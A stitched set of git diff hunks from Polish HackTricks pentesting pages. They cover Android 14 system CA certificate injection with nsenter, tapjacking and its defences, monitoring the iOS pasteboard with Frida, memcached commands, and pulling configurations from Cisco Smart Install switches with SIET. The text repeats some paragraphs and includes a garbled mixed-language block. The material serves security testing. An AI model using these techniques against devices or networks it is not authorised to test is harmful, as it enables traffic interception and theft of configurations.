W najnowszej wersji Androida 14 zaobserwowano znaczną zmianę w obsłudze certyfikatów urzędów certyfikujących (CA) zaufanych przez system. Wcześniej te certyfikaty były przechowywane w **`/system/etc/security/cacerts/`**, dostępne i modyfikowalne przez użytkowników z uprawnieniami roota, co pozwalało na natychmiastowe zastosowanie ich w całym systemie. Jednak wraz z Androidem 14 lokalizacja przechowywania została przeniesiona do **`/apex/com.android.conscrypt/cacerts`**, katalogu w ścieżce **`/apex`**, który jest z natury niemutowalny.
Próby ponownego zamontowania ścieżki **APEX cacerts** jako zapisywalnej kończą się niepowodzeniem, ponieważ system nie zezwala na takie operacje. Nawet próby odmontowania lub nałożenia na katalog tymczasowego systemu plików (tmpfs) nie omijają niemutowalności; aplikacje nadal uzyskują dostęp do oryginalnych danych certyfikatów bez względu na zmiany na poziomie systemu plików. Ta odporność wynika z konfiguracji montowania **`/apex`** z propagacją PRIVATE, zapewniającą, że wszelkie modyfikacje w katalogu **`/apex`** nie wpływają na inne procesy.
Próby ponownego zamontowania ścieżki **APEX cacerts** jako zapisywalnej kończą się niepowodzeniem, ponieważ system nie zezwala na takie operacje. Nawet próby odmontowania lub nałożenia nakładki na katalog za pomocą tymczasowego systemu plików (tmpfs) nie omijają niemutowalności; aplikacje nadal uzyskują dostęp do oryginalnych danych certyfikatu bez względu na zmiany na poziomie systemu plików. Ta odporność wynika z konfiguracji montowania **`/apex`** z propagacją PRIVATE, zapewniającą, że wszelkie modyfikacje w katalogu **`/apex`** nie wpływają na inne procesy.
Inicjalizacja Androida polega na procesie `init`, który po uruchomieniu systemu operacyjnego inicjuje również proces Zygote. Proces ten jest odpowiedzialny za uruchamianie procesów aplikacji z nową przestrzenią montowania, która obejmuje prywatne montowanie **`/apex`**, izolując zmiany w tym katalogu od innych procesów.
Inicjalizacja Androida polega na procesie `init`, który po uruchomieniu systemu operacyjnego inicjuje również proces Zygote. Proces ten odpowiada za uruchamianie procesów aplikacji z nową przestrzenią montowania, która obejmuje prywatne montowanie **`/apex`**, izolując zmiany w tym katalogu od innych procesów.
Mimo to istnieje sposób obejścia dla osób potrzebujących modyfikować certyfikaty CA zaufane przez system w katalogu **`/apex`**. Polega to na ręcznym ponownym zamontowaniu **`/apex`**, aby usunąć propagację PRIVATE, co czyni go zapisywalnym. Proces ten obejmuje skopiowanie zawartości **`/apex/com.android.conscrypt`** do innego miejsca, odmontowanie katalogu **`/apex/com.android.conscrypt`** w celu usunięcia ograniczenia tylko do odczytu, a następnie przywrócenie zawartości do ich pierwotnego miejsca w **`/apex`**. Ten sposób postępowania wymaga szybkiej reakcji, aby uniknąć awarii systemu. Aby zapewnić systemowe zastosowanie tych zmian, zaleca się ponowne uruchomienie `system_server`, co skutecznie restartuje wszystkie aplikacje i przywraca system do spójnego stanu.
```bash
@ -139,9 +139,9 @@ wait # Launched in parallel - wait for completion here
echo "System certificate injected"
```
### Montowanie katalogu za pomocą NSEnter
### Montowanie powiązane poprzez NSEnter
1. **Konfigurowanie katalogu z możliwością zapisu**: W pierwszej kolejności ustanawiany jest katalog z możliwością zapisu poprzez zamontowanie `tmpfs` nad istniejącym katalogiem certyfikatów systemowych non-APEX. Można to osiągnąć za pomocą poniższej komendy:
1. **Konfigurowanie katalogu z możliwością zapisu**: W pierwszej kolejności, katalog z możliwością zapisu jest ustanawiany poprzez zamontowanie `tmpfs` nad istniejącym katalogiem certyfikatów systemowych non-APEX. Można to osiągnąć za pomocą następującej komendy:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
@ -162,20 +162,20 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/
* [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i zostań ekspertem w hakowaniu AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

36
mobile-pentesting/android-app-pentesting/tapjacking.md
View file

@ -7,14 +7,14 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -22,17 +22,17 @@ Inne sposoby wsparcia HackTricks:
## **Podstawowe informacje**
**Tapjacking** to atak, w którym **złośliwa** **aplikacja** jest uruchamiana i **pozycjonuje się na wierzchu aplikacji ofiary**. Gdy zasłania widocznie aplikację ofiary, jej interfejs użytkownika jest zaprojektowany w taki sposób, aby oszukać użytkownika do interakcji z nią, podczas gdy przekazuje interakcję do aplikacji ofiary.\
W rezultacie **oszukuje użytkownika, że wykonuje działania w aplikacji ofiary**.
W rezultacie **oszukuje użytkownika, aby nie zdawał sobie sprawy, że faktycznie wykonuje czynności w aplikacji ofiary**.
### Wykrywanie
Aby wykryć aplikacje podatne na ten atak, należy szukać **eksportowanych aktywności** w manifeście androida (zauważ, że aktywność z filtrem intencji jest automatycznie eksportowana domyślnie). Gdy już znajdziesz eksportowane aktywności, **sprawdź, czy wymagają jakiegokolwiek uprawnienia**. Jest to dlatego, że **złośliwa aplikacja będzie również potrzebować tego uprawnienia**.
Aby wykryć aplikacje podatne na ten atak, należy wyszukać **eksportowane aktywności** w manifeście androida (zauważ, że aktywność z filtrem intencji jest automatycznie eksportowana domyślnie). Gdy już znajdziesz eksportowane aktywności, **sprawdź, czy wymagają jakiegokolwiek uprawnienia**. Jest to dlatego, że **złośliwa aplikacja będzie również potrzebować tego uprawnienia**.
### Ochrona
#### Android 12 (API 31,32) i nowsze
[Zgodnie z tym źródłem](https://www.geeksforgeeks.org/tapjacking-in-android/), ataki tapjacking są automatycznie blokowane przez Androida od wersji 12 (API 31 i 30) i nowszych. Dlatego nawet jeśli aplikacja jest podatna, **nie będzie można jej wykorzystać**.
[Zgodnie z tym źródłem](https://www.geeksforgeeks.org/tapjacking-in-android/), ataki tapjacking są automatycznie blokowane przez Androida od wersji 12 (API 31 i 30) i nowszych. Więc nawet jeśli aplikacja jest podatna, **nie będziesz w stanie jej wykorzystać**.
#### `filterTouchesWhenObscured`
@ -40,7 +40,7 @@ Jeśli **`android:filterTouchesWhenObscured`** jest ustawione na **`true`**, `Vi
#### **`setFilterTouchesWhenObscured`**
Atrybut **`setFilterTouchesWhenObscured`** ustawiony na true również może zapobiec wykorzystaniu tej podatności, jeśli wersja Androida jest niższa.\
Atrybut **`setFilterTouchesWhenObscured`** ustawiony na true może również zapobiec wykorzystaniu tej podatności, jeśli wersja Androida jest niższa.\
Jeśli ustawione na **`true`**, na przykład przycisk może być automatycznie **wyłączony, jeśli jest zasłonięty**:
```xml
<Button android:text="Button"
@ -68,14 +68,28 @@ Przykładowy projekt implementujący **FloatingWindowApp**, który można użyć
Wygląda na to, że ten projekt nie jest już rozwijany, a ta funkcjonalność nie działa poprawnie.
{% endhint %}
Możesz użyć [**qark**](https://github.com/linkedin/qark) z parametrami `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` aby stworzyć złośliwą aplikację do testowania potencjalnych podatności na atak **Tapjacking**.
Możesz użyć [**qark**](https://github.com/linkedin/qark) z parametrami `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` do stworzenia złośliwej aplikacji w celu przetestowania potencjalnych podatności na **Tapjacking**.
Środki zaradcze są stosunkowo proste, ponieważ deweloper może zdecydować, że widok nie będzie otrzymywał zdarzeń dotyku, gdy jest zasłonięty przez inny. Korzystając z [Android Developers Reference](https://developer.android.com/reference/android/view/View#security):
Zapobieganie jest stosunkowo proste, ponieważ programista może zdecydować, czy chce otrzymywać zdarzenia dotykowe, gdy widok jest zasłonięty przez inny. Korzystając z [Android Developers Reference](https://developer.android.com/reference/android/view/View#security):
> Czasami istotne jest, aby aplikacja mogła zweryfikować, czy działanie jest wykonywane z pełną wiedzą i zgodą użytkownika, na przykład przy udzielaniu żądania uprawnienia, dokonywaniu zakupu lub kliknięciu w reklamę. Niestety złośliwa aplikacja mogłaby próbować oszukać użytkownika, aby wykonał te działania, nieświadomy, ukrywając zamierzony cel widoku. Jako środek zaradczy, framework oferuje mechanizm filtrowania dotyku, który można użyć do poprawy bezpieczeństwa widoków zapewniających dostęp do funkcji wymagających poufności.
> Czasami istotne jest, aby aplikacja mogła zweryfikować, czy działanie jest wykonywane z pełną wiedzą i zgodą użytkownika, takie jak udzielenie żądania uprawnienia, dokonanie zakupu lub kliknięcie w reklamę. Niestety złośliwa aplikacja mogłaby próbować oszukać użytkownika, aby wykonał te działania, nieświadomy, ukrywając zamierzony cel widoku. W ramach rozwiązania framework oferuje mechanizm filtrowania dotyku, który można wykorzystać do poprawy bezpieczeństwa widoków zapewniających dostęp do funkcji wymagających poufności.
>
> Aby włączyć filtrowanie dotyku, należy wywołać [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) lub ustawić atrybut układu android:filterTouchesWhenObscured na true. Po włączeniu framework odrzuci dotknięcia, które są odbierane, gdy okno widoku jest zasłonięte przez inne widoczne okno. W rezultacie widok nie będzie otrzymywał dotknięć, gdy pojawi się toast, okno dialogowe lub inne okno nad oknem widoku.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub grupy [**telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

30
mobile-pentesting/ios-pentesting/ios-uipasteboard.md
View file

@ -1,45 +1,45 @@
<details>
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
Dzielenie danych wewnątrz i między aplikacjami na urządzeniach iOS jest ułatwione przez mechanizm [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), który dzieli się na dwie główne kategorie:
Udostępnianie danych wewnątrz i między aplikacjami na urządzeniach iOS jest ułatwione przez mechanizm [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), który dzieli się na dwie główne kategorie:
- **Systemowy schowek ogólny**: Służy do udostępniania danych z **dowolną aplikacją** i jest zaprojektowany do przechowywania danych po restarcie urządzenia i odinstalowaniu aplikacji, funkcja dostępna od iOS 10.
- **Niestandardowe / Nazwane schowki**: Są przeznaczone do udostępniania danych **w ramach aplikacji lub z inną aplikacją**, która ma ten sam identyfikator zespołu, i nie są zaprojektowane do przetrwania po zakończeniu procesu aplikacji, zgodnie z wprowadzonymi zmianami w iOS 10.
- **Niestandardowe / Nazwane schowki**: Są przeznaczone do udostępniania danych **w ramach aplikacji lub z inną aplikacją**, która ma ten sam identyfikator zespołu, i nie są zaprojektowane do przechowywania poza czasem życia procesu aplikacji, który je tworzy, zgodnie z wprowadzonymi zmianami w iOS 10.
**Rozważania dotyczące bezpieczeństwa** odgrywają istotną rolę podczas korzystania ze schowków. Na przykład:
- Nie ma mechanizmu umożliwiającego użytkownikom zarządzanie uprawnieniami aplikacji do dostępu do **schowka**.
- Aby zmniejszyć ryzyko nieautoryzowanego monitorowania schowka w tle, dostęp jest ograniczony do czasu, gdy aplikacja jest w pierwszym planie (od iOS 9).
- Zaleca się unikanie używania trwałych nazwanych schowków na rzecz kontenerów współdzielonych ze względów prywatności.
- Funkcja **Uniwersalny Schowek** wprowadzona wraz z iOS 10, umożliwiająca udostępnianie treści między urządzeniami za pomocą schowka ogólnego, może być zarządzana przez programistów w celu ustawienia wygaśnięcia danych i wyłączenia automatycznego transferu treści.
- Funkcja **Uniwersalny Schowek** wprowadzona wraz z iOS 10, umożliwiająca udostępnianie treści między urządzeniami za pomocą schowka ogólnego, może być zarządzana przez deweloperów w celu ustawienia wygaśnięcia danych i wyłączenia automatycznego transferu treści.
Zapewnienie, że **wrażliwe informacje nie są przypadkowo przechowywane** na globalnym schowku jest kluczowe. Ponadto aplikacje powinny być zaprojektowane tak, aby zapobiegać nadużyciom danych z globalnego schowka do niezamierzonych działań, a programistów zachęca się do wprowadzenia środków zapobiegających kopiowaniu wrażliwych informacji do schowka.
Zapewnienie, że **wrażliwe informacje nie są przypadkowo przechowywane** w globalnym schowku jest kluczowe. Ponadto aplikacje powinny być zaprojektowane tak, aby zapobiegać nadużyciom danych z globalnego schowka do niezamierzonych działań, a deweloperów zachęca się do wprowadzenia środków zapobiegających kopiowaniu wrażliwych informacji do schowka.
### Analiza statyczna
W analizie statycznej wyszukaj w kodzie źródłowym lub binarnym:
- `generalPasteboard` w celu zidentyfikowania użycia **systemowego schowka ogólnego**.
- `generalPasteboard` aby zidentyfikować użycie **systemowego schowka ogólnego**.
- `pasteboardWithName:create:` i `pasteboardWithUniqueName` do tworzenia **niestandardowych schowków**. Sprawdź, czy włączona jest trwałość, chociaż jest to przestarzałe.
### Analiza dynamiczna
Analiza dynamiczna polega na hakowaniu lub śledzeniu określonych metod:
- Monitoruj `generalPasteboard` w celu użycia systemowego.
Analiza dynamiczna polega na hakowaniu lub śledzeniu konkretnych metod:
- Monitoruj `generalPasteboard` dla użycia ogólnego w systemie.
- Śledź `pasteboardWithName:create:` i `pasteboardWithUniqueName` dla niestandardowych implementacji.
- Obserwuj wywołania metody `setPersistent:` do sprawdzenia ustawień trwałości.
@ -50,7 +50,7 @@ Kluczowe szczegóły do monitorowania obejmują:
Przykładem narzędzia do monitorowania jest **monitor schowka objection**, który sprawdza schowek ogólny co 5 sekund w poszukiwaniu zmian i wypisuje nowe dane.
Oto prosty przykładowy skrypt JavaScriptu, inspirowany podejściem objection, do odczytywania i rejestrowania zmian ze schowka co 5 sekund:
Oto prosty przykładowy skrypt JavaScript, inspirowany podejściem objection, do odczytywania i rejestrowania zmian ze schowka co 5 sekund:
```javascript
const UIPasteboard = ObjC.classes.UIPasteboard;
const Pasteboard = UIPasteboard.generalPasteboard();
@ -80,7 +80,7 @@ console.log(items);
* [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -91,7 +91,7 @@ console.log(items);
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

31
network-services-pentesting/11211-memcache/memcache-commands.md
View file

@ -14,11 +14,10 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Arkusz pomocy komend
**Z** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)
@ -30,20 +29,20 @@ Niestety opis składni nie jest zbyt czytelny, a prosta komenda pomocy wymieniaj
| Komenda | Opis | Przykład |
| --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| get | Odczytuje wartość | `get mykey` |
| set | Ustawia klucz bezwarunkowo | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Upewnij się, że używasz \r\n jako znaków nowej linii podczas korzystania z narzędzi wiersza poleceń Unix. Na przykład&#x3C;/p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| set | Ustawia klucz bezwarunkowo | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Upewnij się, że używasz \r\n jako znaków nowej linii przy użyciu narzędzi wiersza poleceń Unix. Na przykład&#x3C;/p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| add | Dodaje nowy klucz | `add newkey 0 60 5` |
| replace | Nadpisuje istniejący klucz | `replace key 0 60 5` |
| append | Dołącza dane do istniejącego klucza | `append key 0 60 15` |
| prepend | Dodaje dane na początku istniejącego klucza | `prepend key 0 60 15` |
| incr | Zwiększa wartość numerycznego klucza o podaną liczbę | `incr mykey 2` |
| decr | Zmniejsza wartość numerycznego klucza o podaną liczbę | `decr mykey 5` |
| decr | Zmniejsza wartość numerycznego klucza o podaną liczbę | `decr mykey 5` |
| delete | Usuwa istniejący klucz | `delete mykey` |
| flush\_all | Natychmiast unieważnia wszystkie elementy | `flush_all` |
| flush\_all | Unieważnia wszystkie elementy za n sekund | `flush_all 900` |
| stats | Wyświetla ogólne statystyki | `stats` |
| | Wyświetla statystyki pamięci | `stats slabs` |
| stats | Wyświetla ogólne statystyki | `stats` |
| | Wyświetla statystyki pamięci | `stats slabs` |
| | Wyświetla statystyki alokacji na wyższym poziomie | `stats malloc` |
| | Wyświetla informacje o elementach | `stats items` |
| | Wyświetla informacje o elementach | `stats items` |
| | | `stats detail` |
| | | `stats sizes` |
| | Resetuje liczniki statystyk | `stats reset` |
@ -54,7 +53,7 @@ Niestety opis składni nie jest zbyt czytelny, a prosta komenda pomocy wymieniaj
#### Statystyki ruchu <a href="#traffic-statistics" id="traffic-statistics"></a>
Możesz zapytać o bieżące statystyki ruchu za pomocą polecenia
Możesz zapytać o bieżące statystyki ruchu, używając polecenia
```
stats
```
@ -113,7 +112,7 @@ STAT active_slabs 3
STAT total_malloced 3145436
END
```
Jeśli nie jesteś pewien, czy masz wystarczająco pamięci dla swojej instancji memcached, zawsze zwracaj uwagę na liczniki "evictions" podane przez polecenie "stats". Jeśli masz wystarczająco pamięci dla instancji, licznik "evictions" powinien wynosić 0 lub przynajmniej nie wzrastać.
Jeśli nie jesteś pewien, czy masz wystarczająco pamięci dla swojego egzemplarza memcached, zawsze zwracaj uwagę na liczniki "evictions" podane przez polecenie "stats". Jeśli masz wystarczająco pamięci dla egzemplarza, licznik "evictions" powinien wynosić 0 lub przynajmniej nie wzrastać.
#### Które klucze są używane? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
@ -121,9 +120,17 @@ Nie ma wbudowanej funkcji do bezpośredniego określenia bieżącego zestawu klu
```
stats items
```
### Command to determine how many keys do exist
### English:
To polecenie pozwala określić, ile kluczy istnieje.
```
**stats items**
```
### Polish:
```
**statystyki elementów**
```
```
stats items
STAT items:1:number 220
@ -136,7 +143,7 @@ END
To przynajmniej pomaga zobaczyć, czy jakiekolwiek klucze są używane. Aby wypisać nazwy kluczy z skryptu PHP, który już ma dostęp do memcache, można użyć kodu PHP z [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html).
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}

14
network-services-pentesting/4786-cisco-smart-install.md
View file

@ -4,7 +4,7 @@
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -12,7 +12,7 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -26,7 +26,7 @@
PORT STATE SERVICE
4786/tcp open smart-install
```
## **Narzędzie do Wykorzystania Smart Install**
## **Narzędzie do eksploatacji Smart Install**
**W 2018 roku znaleziono krytyczną podatność, CVE-20180171, w tym protokole. Poziom zagrożenia wynosi 9.8 w skali CVSS.**
@ -38,9 +38,9 @@ PORT STATE SERVICE
**[**SIET**](https://github.com/frostbits-security/SIET) **(Smart Install Exploitation Tool)** został opracowany do wykorzystania tej podatności, umożliwia nadużycie Cisco Smart Install. W tym artykule pokażę Ci, jak możesz odczytać prawidłowy plik konfiguracyjny sprzętu sieciowego. Konfiguracja eksfiltracji może być cenna dla pentestera, ponieważ pozwoli dowiedzieć się o unikalnych cechach sieci. To ułatwi życie i pozwoli znaleźć nowe wektory ataku.
**Urządzeniem docelowym będzie "aktywny" przełącznik Cisco Catalyst 2960. Wirtualne obrazy nie posiadają Cisco Smart Install, więc można ćwiczyć tylko na rzeczywistym sprzęcie.**
**Urządzeniem docelowym będzie "żywy" przełącznik Cisco Catalyst 2960. Wirtualne obrazy nie posiadają Cisco Smart Install, więc można ćwiczyć tylko na rzeczywistym sprzęcie.**
Adres docelowego przełącznika to **10.10.100.10, a CSI jest aktywne.** Załaduj SIET i rozpocznij atak. **Argument -g** oznacza eksfiltrację konfiguracji z urządzenia, **argument -i** pozwala ustawić adres IP podatnego celu.
Adresem docelowego przełącznika jest **10.10.100.10 i CSI jest aktywne.** Wczytaj SIET i rozpocznij atak. **Argument -g** oznacza eksfiltrację konfiguracji z urządzenia, **argument -i** pozwala ustawić adres IP podatnego celu.
```
